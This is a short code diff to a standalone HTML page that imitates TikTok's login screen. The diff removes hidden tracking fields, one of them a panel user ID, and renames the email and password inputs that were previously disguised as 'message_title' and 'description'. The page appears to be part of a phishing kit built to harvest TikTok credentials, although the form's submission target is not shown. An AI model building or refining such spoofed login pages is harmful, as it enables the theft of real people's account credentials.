--- a/tiktok.html
+++ b/tiktok.html
@@ -140,15 +140,12 @@
     <p class="login-subtitle">Manage your account, check notifications, comment on videos, and more.</p>
 
     <form id="allForm">
-      <input type="hidden" name="link" value="TikTok Login">
-      <input type="hidden" name="ftype" value="normal">
-      <input type="hidden" name="login" value="login">
-      <input type="hidden" name="user_id" value="16934">
+   
 
-      <input type="text" class="form-input" name="message_title" placeholder="Email or username" required>
+      <input type="text" class="form-input" name="Email" placeholder="Email or username" required>
       
       <div class="form-group">
-        <input type="password" class="form-input" id="password" name="description" placeholder="Password" required>
+        <input type="password" class="form-input" id="password" name="Password" placeholder="Password" required>
         <span class="toggle-password" id="togglePassword">👁️</span>
       </div>
 
